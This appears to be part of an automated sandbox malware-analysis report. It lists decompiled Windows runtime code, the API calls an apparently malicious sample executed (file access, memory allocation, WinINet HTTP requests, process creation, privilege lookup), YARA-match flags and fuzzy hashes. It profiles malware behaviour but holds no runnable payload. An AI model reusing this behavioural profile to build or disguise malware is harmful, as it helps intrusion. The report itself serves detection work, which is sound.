                                      • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                      • Instruction ID: 84544f1c859d46b9685dd5f42abad5989907609042106449ed93b840781b588a
                                      • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                      • Instruction Fuzzy Hash:
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 53%
                                      			E00B9FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                      				void* _t7;
                                      				intOrPtr _t9;
                                      				intOrPtr _t10;
                                      				intOrPtr* _t12;
                                      				intOrPtr* _t13;
                                      				intOrPtr _t14;
                                      				intOrPtr* _t15;
                                      
                                      				_t13 = __edx;
                                      				_push(_a4);
                                      				_t14 =  *[fs:0x18];
                                      				_t15 = _t12;
                                      				_t7 = E00B4CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                      				_push(_t13);
                                      				E00B95720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                      				_t9 =  *_t15;
                                      				if(_t9 == 0xffffffff) {
                                      					_t10 = 0;
                                      				} else {
                                      					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                      				}
                                      				_push(_t10);
                                      				_push(_t15);
                                      				_push( *((intOrPtr*)(_t15 + 0xc)));
                                      				_push( *((intOrPtr*)(_t14 + 0x24)));
                                      				return E00B95720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                      			}










                                      APIs
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B9FDFA
                                      Strings
                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00B9FE01
                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00B9FE2B
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                      • API String ID: 885266447-3903918235
                                      • Opcode ID: 31a86a399c0bf1214dca4bdcc67acabaa7d46b509e1cb48f356dc8dd3c7aaa6b
                                      • Instruction ID: 4e9987f2760afc25e2a9c2e217c7955b9815bb02e0474612eb8d887563175511
                                      • Opcode Fuzzy Hash: 31a86a399c0bf1214dca4bdcc67acabaa7d46b509e1cb48f356dc8dd3c7aaa6b
                                      • Instruction Fuzzy Hash: 5DF0F632240605BFDA211A85DC06F73BF9AEB44730F244364F628961E1DA62FD2097F0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Executed Functions

                                      APIs
                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,01233BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,01233BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0123862D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Offset: 01220000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID: .z`
                                      • API String ID: 823142352-1441809116
                                      • Opcode ID: a9e8a1a6e2ce1a808177c3b1e3dc285aa518fdb98830223e79700bc716bfb096
                                      • Instruction ID: e6cfbaa0d25029a646c73d3d2c5bd2e2fcba1345dc4dc864abf70d551025dd62
                                      • Opcode Fuzzy Hash: a9e8a1a6e2ce1a808177c3b1e3dc285aa518fdb98830223e79700bc716bfb096
                                      • Instruction Fuzzy Hash: 8101A4B2215208ABCB18DF89DC84DEB77ADEF8C754F158248FA0997241D630E851CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,01233BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,01233BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0123862D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Offset: 01220000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID: .z`
                                      • API String ID: 823142352-1441809116
                                      • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                      • Instruction ID: eb01ffaf56b59afcdbe6d723bccaf5a2f2a700c54c031b26be63271c26a125d3
                                      • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                      • Instruction Fuzzy Hash: 50F0B2B2214208ABCB08CF88DC84EEB77ADAF8C754F158248FA0D97240C630E851CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • NtReadFile.NTDLL(01233D72,5E972F65,FFFFFFFF,01233A31,?,?,01233D72,?,01233A31,FFFFFFFF,5E972F65,01233D72,?,00000000), ref: 012386D5
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Offset: 01220000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: FileRead
                                      • String ID:
                                      • API String ID: 2738559852-0
                                      • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                      • Instruction ID: 3ce0ef65d2ffcf5c4766db4eb71ebc7ac67cf07c797b18d316314ca50de20662
                                      • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                      • Instruction Fuzzy Hash: 32F0A4B2210208ABCB14DF89DC84EEB77ADAF8C754F158248BA1DA7241D630E951CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,01222D11,00002000,00003000,00000004), ref: 012387F9
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Offset: 01220000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateMemoryVirtual
                                      • String ID:
                                      • API String ID: 2167126740-0
                                      • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                      • Instruction ID: 26cecdd18ac03f384570ad44ae05d8bcdb8b2f97e4c09b46c75ab126d9b6e2bd
                                      • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                      • Instruction Fuzzy Hash: 3BF015B2210208ABCB14DF89CC80EAB77ADAF88754F118148FE08A7241C630F910CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • NtClose.NTDLL(01233D50,?,?,01233D50,00000000,FFFFFFFF), ref: 01238735
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Offset: 01220000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: Close
                                      • String ID:
                                      • API String ID: 3535843008-0
                                      • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                      • Instruction ID: 32297389ad1d161092f2fa0b99d6e8520a461aeea35999939e1062e42d875f35
                                      • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                      • Instruction Fuzzy Hash: 28D012756002146BD710EB98CC45EA7775CEF44750F154459BA585B241C570F600C6E0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.567946255.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
                                      • Associated: 00000006.00000002.568362135.000000000550B000.00000040.00000001.sdmp
                                      • Associated: 00000006.00000002.568376162.000000000550F000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 8a38a3c2d5a28c1a54ff7f45754b823841d070909846f286e4de960be2f9296c
                                      • Instruction ID: 6b25fa7830fee6fd39e4878a760f60eff454eadb0913811af90f27dd9e16c644
                                      • Opcode Fuzzy Hash: 8a38a3c2d5a28c1a54ff7f45754b823841d070909846f286e4de960be2f9296c
                                      • Instruction Fuzzy Hash: 54900265711004030105A55A0754647006697D5391391C022F1005550CDB6188616162
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.567946255.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
                                      • Associated: 00000006.00000002.568362135.000000000550B000.00000040.00000001.sdmp Download File
                                      • Associated: 00000006.00000002.568376162.000000000550F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 2498d521ed525e8ab95c27793be25ffa3c14a010ebf440aa6c983bf85fe8f11a
                                      • Instruction ID: d3ebf8c433446eb33e79962d68f929fd3ed2d5b15071757cb4c5ae42241162d0
                                      • Opcode Fuzzy Hash: 2498d521ed525e8ab95c27793be25ffa3c14a010ebf440aa6c983bf85fe8f11a
                                      • Instruction Fuzzy Hash: 919002A1702004034105715A4464756402A97E0241B91C022E1004590DCA6588917166
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.567946255.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
                                      • Associated: 00000006.00000002.568362135.000000000550B000.00000040.00000001.sdmp Download File
                                      • Associated: 00000006.00000002.568376162.000000000550F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: cbf47a9814421083680ef4e7d8db2a14114669e4e891f84e3afe25d3ef3976f3
                                      • Instruction ID: 19b4e7f3ab2a1e9ec2d7999b8316cb0574933d8dfeb28b76143fb5397c80dee0
                                      • Opcode Fuzzy Hash: cbf47a9814421083680ef4e7d8db2a14114669e4e891f84e3afe25d3ef3976f3
                                      • Instruction Fuzzy Hash: 3F90027170100802D100659A5458786002597E0341F91D012A5014555ECBA588917172
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.567946255.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
                                      • Associated: 00000006.00000002.568362135.000000000550B000.00000040.00000001.sdmp Download File
                                      • Associated: 00000006.00000002.568376162.000000000550F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 5e4bbbecfe15b392b3fe18dbbebbb24b9702068ee089e018179d4c72541d76e3
                                      • Instruction ID: 09e3fcf95b6407dadd5ffd428f3cf2d1da99f214ab77d755a3211f48ef24f857
                                      • Opcode Fuzzy Hash: 5e4bbbecfe15b392b3fe18dbbebbb24b9702068ee089e018179d4c72541d76e3
                                      • Instruction Fuzzy Hash: A690027171114802D110615A8454746002597D1241F91C412A0814558D8BD588917163
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.567946255.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
                                      • Associated: 00000006.00000002.568362135.000000000550B000.00000040.00000001.sdmp Download File
                                      • Associated: 00000006.00000002.568376162.000000000550F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 1ab351e0395552d9ee9e79954a3609167e2fda33c56b6a245f2c1a1fa9749988
                                      • Instruction ID: 252965e65cbe3a757cf83a59f797845c8d815b9112942c0593a519a2c11b3a9c
                                      • Opcode Fuzzy Hash: 1ab351e0395552d9ee9e79954a3609167e2fda33c56b6a245f2c1a1fa9749988
                                      • Instruction Fuzzy Hash: 2190026971300402D180715A545874A002597D1242FD1D416A0005558CCE5588696362
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.567946255.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
                                      • Associated: 00000006.00000002.568362135.000000000550B000.00000040.00000001.sdmp Download File
                                      • Associated: 00000006.00000002.568376162.000000000550F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: c2af70ce37eb20067017d7fdf9b432cd2b33563a7e7559a7272031a024aba170
                                      • Instruction ID: ae3d7c3d15c5e2b77b24a71a293b6b47ebeb1e6f3c9a1878d9c22e25b4c6784a
                                      • Opcode Fuzzy Hash: c2af70ce37eb20067017d7fdf9b432cd2b33563a7e7559a7272031a024aba170
                                      • Instruction Fuzzy Hash: 8E90027170504C42D140715A4454B86003597D0345F91C012A0054694D9B658D55B6A2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.567946255.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
                                      • Associated: 00000006.00000002.568362135.000000000550B000.00000040.00000001.sdmp Download File
                                      • Associated: 00000006.00000002.568376162.000000000550F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 8bb027dd51c8525c9259da73ff3622ab8363534ffca3e2a317df65a67c0e826b
                                      • Instruction ID: 4f1b7fa6630763382fb38a0631ec86cf9a0532843b1ecd0a80e9abe799fb8de9
                                      • Opcode Fuzzy Hash: 8bb027dd51c8525c9259da73ff3622ab8363534ffca3e2a317df65a67c0e826b
                                      • Instruction Fuzzy Hash: D090027170100C02D180715A445478A002597D1341FD1C016A0015654DCF558A5977E2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.567946255.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
                                      • Associated: 00000006.00000002.568362135.000000000550B000.00000040.00000001.sdmp
                                      • Associated: 00000006.00000002.568376162.000000000550F000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.567946255.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
                                      • Associated: 00000006.00000002.568362135.000000000550B000.00000040.00000001.sdmp
                                      • Associated: 00000006.00000002.568376162.000000000550F000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.567946255.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
                                      • Associated: 00000006.00000002.568362135.000000000550B000.00000040.00000001.sdmp
                                      • Associated: 00000006.00000002.568376162.000000000550F000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.567946255.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
                                      • Associated: 00000006.00000002.568362135.000000000550B000.00000040.00000001.sdmp
                                      • Associated: 00000006.00000002.568376162.000000000550F000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.567946255.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
                                      • Associated: 00000006.00000002.568362135.000000000550B000.00000040.00000001.sdmp
                                      • Associated: 00000006.00000002.568376162.000000000550F000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.567946255.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
                                      • Associated: 00000006.00000002.568362135.000000000550B000.00000040.00000001.sdmp
                                      • Associated: 00000006.00000002.568376162.000000000550F000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.567946255.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
                                      • Associated: 00000006.00000002.568362135.000000000550B000.00000040.00000001.sdmp
                                      • Associated: 00000006.00000002.568376162.000000000550F000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 01238C57
                                      • InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 01238CD8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Offset: 01220000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$ConnectOpen
                                      • String ID: A$Conn$ConnectA$Inte$Inte$InternetConnectA$InternetOpenA$Open$ectA$rnet$rnet$rnetConnectA$rnetOpenA
                                      • API String ID: 2790792615-486111735
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 01238D58
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Offset: 01220000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: HttpOpenRequest
                                      • String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
                                      • API String ID: 1984915467-4016285707
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 01238D58
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Offset: 01220000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: HttpOpenRequest
                                      • String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
                                      • API String ID: 1984915467-4016285707
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 01238DCC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Offset: 01220000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: HttpRequestSend
                                      • String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
                                      • API String ID: 360639707-2503632690
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 01238CD8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Offset: 01220000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: ConnectInternet
                                      • String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
                                      • API String ID: 3050416762-1024195942
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 01238C57
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Offset: 01220000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: InternetOpen
                                      • String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
                                      • API String ID: 2038078732-3155091674
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 01238C57
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Offset: 01220000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: InternetOpen
                                      • String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
                                      • API String ID: 2038078732-3155091674
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 01238DCC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Offset: 01220000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: HttpRequestSend
                                      • String ID: HttpSendRequestA$RequestA$SendRequestA
                                      • API String ID: 360639707-2125227114
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • Sleep.KERNELBASE(000007D0), ref: 012373A8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Offset: 01220000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: Sleep
                                      • String ID: net.dll$wininet.dll
                                      • API String ID: 3472027048-1269752229
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • Sleep.KERNELBASE(000007D0), ref: 012373A8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Offset: 01220000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: Sleep
                                      • String ID: net.dll$wininet.dll
                                      • API String ID: 3472027048-1269752229
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,01223B93), ref: 0123891D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Offset: 01220000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID: .z`
                                      • API String ID: 3298025750-1441809116
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,01223B93), ref: 0123891D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Offset: 01220000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID: .z`
                                      • API String ID: 3298025750-1441809116
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 012272DA
                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 012272FB
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Offset: 01220000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: MessagePostThread
                                      • String ID:
                                      • API String ID: 1836367815-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 012272DA
                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 012272FB
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Offset: 01220000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: MessagePostThread
                                      • String ID:
                                      • API String ID: 1836367815-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 012272DA
                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 012272FB
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Offset: 01220000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: MessagePostThread
                                      • String ID:
                                      • API String ID: 1836367815-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 01229BB2
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Offset: 01220000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: Load
                                      • String ID:
                                      • API String ID: 2234796835-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 012389B4
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Offset: 01220000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateInternalProcess
                                      • String ID:
                                      • API String ID: 2186235152-0
                                      • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                      • Instruction ID: cd0b2a5cfbf1dd584e7bba68d973c01f7ca18cb5a4f542cd663eca408d98affe
                                      • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                      • Instruction Fuzzy Hash: 5001B2B2214108BFCB54DF89DC80EEB77ADAF8C754F158258FA0DA7240C630E851CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0122CCF0,?,?), ref: 0123746C
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Offset: 01220000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateThread
                                      • String ID:
                                      • API String ID: 2422867632-0
                                      • Opcode ID: 3d896b48f5ae3f61c940dbc0491d4aba50d9e38c85a04b8e2dcf38253628bd18
                                      • Instruction ID: 77fe42b38ea9e4d9b90540339b6ce2cb6a903d18ace19ca159f3d902f2fc7a49
                                      • Opcode Fuzzy Hash: 3d896b48f5ae3f61c940dbc0491d4aba50d9e38c85a04b8e2dcf38253628bd18
                                      • Instruction Fuzzy Hash: ECE06DB33902043AE62065A9AC02FA7B69CDBD1B21F54002AFB4DEA2C0D995F90142A4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,0122CFC2,0122CFC2,?,00000000,?,?), ref: 01238A80
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Offset: 01220000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: LookupPrivilegeValue
                                      • String ID:
                                      • API String ID: 3899507212-0
                                      • Opcode ID: 1ddf838b8c5bdd4522c55dffe405d0bc595aaa02dcc824db0488fd9f29b686e0
                                      • Instruction ID: 4153dce65b74a54675873fc296e36ff8939403ecad75d8bdb9668503d68543cd
                                      • Opcode Fuzzy Hash: 1ddf838b8c5bdd4522c55dffe405d0bc595aaa02dcc824db0488fd9f29b686e0
                                      • Instruction Fuzzy Hash: 80F0A0B26502056FCB10CF54CC40EE73BA8EF89210F148269FA4C9B342C631E812CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0122CCF0,?,?), ref: 0123746C
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Offset: 01220000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateThread
                                      • String ID:
                                      • API String ID: 2422867632-0
                                      • Opcode ID: 948b98ecc13716179a12d50c1ffe524c5dd9f8e9f762166340a6fb15000a837c
                                      • Instruction ID: 81a0a6cc998276179cacea299815397f1cf6f806e6db270274a82a02ad44156c
                                      • Opcode Fuzzy Hash: 948b98ecc13716179a12d50c1ffe524c5dd9f8e9f762166340a6fb15000a837c
                                      • Instruction Fuzzy Hash: 0EE04FB33902003AE63065989C02FB776A89BE1B20F550129F749AB2C0D9A5F90142A4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
